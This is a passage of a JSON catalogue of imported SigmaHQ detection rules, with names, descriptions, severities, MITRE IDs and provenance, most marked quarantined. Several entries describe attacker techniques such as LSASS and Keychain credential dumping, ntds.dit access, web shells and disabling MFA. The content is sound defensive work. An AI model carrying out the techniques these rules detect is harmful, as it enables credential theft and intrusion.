"sigmahq-sigma-b110ebaf-697f-4da1-afd5-b536fa27a2c1", "type": "detection", "name": "Potential Signing Bypass Via Windows Developer Features - Registry", "description": "Detects the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\", 
which allows the user to install untrusted packages.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-signing-bypass-via-windows-developer-features-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml" } }, { "id": "sigmahq-sigma-b120b587-a4c2-4b94-875d-99c9807d6955", "type": "detection", "name": "Credentials from Password Stores - Keychain", "description": "Detects password dumps from Keychain", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credentials-from-password-stores-keychain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b120b587-a4c2-4b94-875d-99c9807d6955", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" } }, { "id": "sigmahq-sigma-b124ddf4-778d-418e-907f-6dd3fc0d31cd", "type": "detection", "name": 
"Arbitrary File Download Via PresentationHost.EXE", "description": "Detects usage of \"PresentationHost\" which is a utility that runs \".xbap\" (Browser Applications) files to download arbitrary files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/arbitrary-file-download-via-presentationhost-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b124ddf4-778d-418e-907f-6dd3fc0d31cd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_presentationhost_download.yml" } }, { "id": "sigmahq-sigma-b1377339-fda6-477a-b455-ac0923f9ec2c", "type": "detection", "name": "Remote Access Tool - AnyDesk Piped Password Via CLI", "description": "Detects piping the password to an anydesk instance via CMD and the '--set-password' flag.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-anydesk-piped-password-via-cli.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1377339-fda6-477a-b455-ac0923f9ec2c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", 
"imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_piped_password_via_cli.yml" } }, { "id": "sigmahq-sigma-b140afd9-474b-4072-958e-2ebb435abd68", "type": "detection", "name": "Suspicious Get-ADDBAccount Usage", "description": "Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-get-addbaccount-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b140afd9-474b-4072-958e-2ebb435abd68", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" } }, { "id": "sigmahq-sigma-b17ea6f7-6e90-447e-a799-e6c0a493d6ce", "type": "detection", "name": "Shadow Copies Creation Using Operating Systems Utilities", "description": "Shadow Copies creation using operating systems utilities, possible credential access", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1003.002", "T1003.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shadow-copies-creation-using-operating-systems-utilities.yaml", "quarantine_reason": "imported rule; upstream query 
language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b17ea6f7-6e90-447e-a799-e6c0a493d6ce", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_shadow_copies_creation.yml" } }, { "id": "sigmahq-sigma-b18454c8-0be3-41f7-86bc-9c614611b839", "type": "detection", "name": "Multi Factor Authentication Disabled For User Account", "description": "Detects changes to the \"StrongAuthenticationRequirement\" value, where the state is set to \"0\" or \"Disabled\".\nThreat actors were seen disabling multi-factor authentication for users in order to maintain or achieve access to the account. Also seen in SIM swap attacks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/multi-factor-authentication-disabled-for-user-account.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b18454c8-0be3-41f7-86bc-9c614611b839", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_user_account_mfa_disable.yml" } }, { "id": "sigmahq-sigma-b1876533-4ed5-4a83-90f3-b8645840a413", "type": "detection", "name": "HackTool - SafetyKatz Execution", "description": "Detects the execution of the hacktool SafetyKatz via PE information and default Image name", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": 
"_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-safetykatz-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1876533-4ed5-4a83-90f3-b8645840a413", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_safetykatz.yml" } }, { "id": "sigmahq-sigma-b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "type": "detection", "name": "HackTool - F-Secure C3 Load by Rundll32", "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-f-secure-c3-load-by-rundll32.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_c3_rundll32_pattern.yml" } }, { "id": "sigmahq-sigma-b19146a3-25d4-41b4-928b-1e2a92641b1b", "type": "detection", "name": "Remote Access Tool - ScreenConnect Server Web Shell Execution", "description": "Detects potential web shell execution from the ScreenConnect server 
process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-server-web-shell-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b19146a3-25d4-41b4-928b-1e2a92641b1b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_webshell.yml" } }, { "id": "sigmahq-sigma-b1bc08d1-8224-4758-a0e6-fbcfc98c73bb", "type": "detection", "name": "Roles Assigned Outside PIM", "description": "Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/roles-assigned-outside-pim.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1bc08d1-8224-4758-a0e6-fbcfc98c73bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_assigned_outside_of_pim.yml" } }, { "id": "sigmahq-sigma-b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "type": 
"detection", "name": "HackTool - HandleKatz Duplicating LSASS Handle", "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1106", "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-handlekatz-duplicating-lsass-handle.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_hktl_handlekatz_lsass_access.yml" } }, { "id": "sigmahq-sigma-b1c50487-1967-4315-a026-6491686d860e", "type": "detection", "name": "Office Macro File Creation From Suspicious Process", "description": "Detects the creation of a office macro file from a a suspicious process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/office-macro-file-creation-from-suspicious-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1c50487-1967-4315-a026-6491686d860e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": 
"2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_office_macro_files_from_susp_process.yml" } }, { "id": "sigmahq-sigma-b1cb4ab6-ac31-43f4-adf1-d9d08957419c", "type": "detection", "name": "PUA - PingCastle Execution", "description": "Detects the execution of PingCastle, a tool designed to quickly assess the Active Directory security level.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1595" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-pingcastle-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1cb4ab6-ac31-43f4-adf1-d9d08957419c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_pingcastle.yml" } }, { "id": "sigmahq-sigma-b1decb61-ed83-4339-8e95-53ea51901720", "type": "detection", "name": "TeamViewer Log File Deleted", "description": "Detects the deletion of the TeamViewer log files which may indicate an attempt to destroy forensic evidence", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1070.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/teamviewer-log-file-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1decb61-ed83-4339-8e95-53ea51901720", "source_commit": 
"df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_delete/file_delete_win_delete_teamviewer_logs.yml" } }, { "id": "sigmahq-sigma-b1e0b3f5-b62e-41be-886a-daffde446ad4", "type": "detection", "name": "No Suitable Encryption Key Found For Generating Kerberos Ticket", "description": "Detects errors when a target server doesn't have suitable keys for generating kerberos tickets.\nThis issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/no-suitable-encryption-key-found-for-generating-kerberos-ticket.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1e0b3f5-b62e-41be-886a-daffde446ad4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_tgs_no_suitable_encryption_key_found.yml" } }, { "id": "sigmahq-sigma-b1e5da3b-ca8e-4adf-915c-9921f3d85481", "type": "detection", "name": "RDP to HTTP or HTTPS Target Ports", "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": 
"_quarantine", "mitre_techniques": [ "T1572", "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/rdp-to-http-or-https-target-ports.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/network_connection/net_connection_win_rdp_to_http.yml" } }, { "id": "sigmahq-sigma-b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", "type": "detection", "name": "New Generic Credentials Added Via Cmdkey.EXE", "description": "Detects usage of \"cmdkey.exe\" to add generic credentials.\nAs an example, this can be used before connecting to an RDP session via command line interface.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-generic-credentials-added-via-cmdkey-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1ec66c6-f4d1-4b5c-96dd-af28ccae7727", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_cmdkey_adding_generic_creds.yml" } }, { "id": "sigmahq-sigma-b1f73849-6329-4069-bc8f-78a604bb8b23", "type": "detection", "name": "Remote Access Tool - ScreenConnect Remote Command 
Execution", "description": "Detects the execution of a system command via the ScreenConnect RMM service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-screenconnect-remote-command-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b1f73849-6329-4069-bc8f-78a604bb8b23", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution.yml" } }, { "id": "sigmahq-sigma-b207d563-a1d9-4275-b349-77d1eb55aa6d", "type": "detection", "name": "System Info Discovery via Sysinfo Syscall", "description": "Detects use of the sysinfo system call in Linux, which provides a snapshot of key system statistics such as uptime, load averages, memory usage, and the number of running processes.\nMalware or reconnaissance tools might leverage sysinfo to fingerprint the system - gathering data to determine if it's a viable target.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1057", "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/system-info-discovery-via-sysinfo-syscall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"b207d563-a1d9-4275-b349-77d1eb55aa6d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/syscall/lnx_auditd_susp_discovery_sysinfo_syscall.yml" } }, { "id": "sigmahq-sigma-b210394c-ba12-4f89-9117-44a2464b9511", "type": "detection", "name": "SMB Create Remote File Admin Share", "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/smb-create-remote-file-admin-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b210394c-ba12-4f89-9117-44a2464b9511", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" } }, { "id": "sigmahq-sigma-b222df08-0e07-11eb-adc1-0242ac120002", "type": "detection", "name": "Invoke-Obfuscation CLIP+ Launcher", "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-clip-launcher.yaml", "quarantine_reason": "imported rule; upstream query language 
not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b222df08-0e07-11eb-adc1-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_clip.yml" } }, { "id": "sigmahq-sigma-b22a5b36-2431-493a-8be1-0bae56c28ef3", "type": "detection", "name": "Hidden User Creation", "description": "Detects creation of a hidden user account on macOS (UserID < 500) or with IsHidden option", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hidden-user-creation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b22a5b36-2431-493a-8be1-0bae56c28ef3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_create_hidden_account.yml" } }, { "id": "sigmahq-sigma-b2309017-4235-44fe-b5af-b15363011957", "type": "detection", "name": "Uncommon Child Process Of Defaultpack.EXE", "description": "Detects uncommon child processes of \"DefaultPack.EXE\" binary as a proxy to launch other programs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/uncommon-child-process-of-defaultpack-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b2309017-4235-44fe-b5af-b15363011957", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_defaultpack_uncommon_child_process.yml" } }, { "id": "sigmahq-sigma-b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "type": "detection", "name": "HackTool - SharpView Execution", "description": "Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1049", "T1069.002", "T1482", "T1135", "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpview-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_sharpview.yml" } }, { "id": "sigmahq-sigma-b236190c-1c61-41e9-84b3-3fe03f6d76b0", "type": "detection", "name": "Potential Regsvr32 Commandline Flag Anomaly", "description": "Detects a potential command line flag anomaly related to \"regsvr32\" in which the \"/i\" flag is used without the \"/n\" which should be uncommon.", 
"version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-regsvr32-commandline-flag-anomaly.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_regsvr32_flags_anomaly.yml" } }, { "id": "sigmahq-sigma-b237c54b-0f15-4612-a819-44b735e0de27", "type": "detection", "name": "A Security-Enabled Global Group Was Deleted", "description": "Detects activity when a security-enabled global group is deleted", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/a-security-enabled-global-group-was-deleted.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b237c54b-0f15-4612-a819-44b735e0de27", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/account_management/win_security_security_enabled_global_group_deleted.yml" } }, { "id": "sigmahq-sigma-b23818c7-e575-4d13-8012-332075ec0a2b", "type": "detection", "name": "Register New IFiltre For Persistence", "description": "Detects when an attacker registers a new IFilter for an extension. 
Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index.\nYou can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/register-new-ifiltre-for-persistence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b23818c7-e575-4d13-8012-332075ec0a2b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml" } }, { "id": "sigmahq-sigma-b243b280-65fe-48df-ba07-6ddea7646427", "type": "detection", "name": "Discovery of a System Time", "description": "Identifies use of various commands to query a systems time. 
This technique may be used before executing a scheduled task or to discover the time zone of a target system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1124" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/discovery-of-a-system-time.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b243b280-65fe-48df-ba07-6ddea7646427", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_time_discovery.yml" } }, { "id": "sigmahq-sigma-b2572bf9-e20a-4594-b528-40bde666525a", "type": "detection", "name": "Impossible Travel", "description": "Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/impossible-travel.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b2572bf9-e20a-4594-b528-40bde666525a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
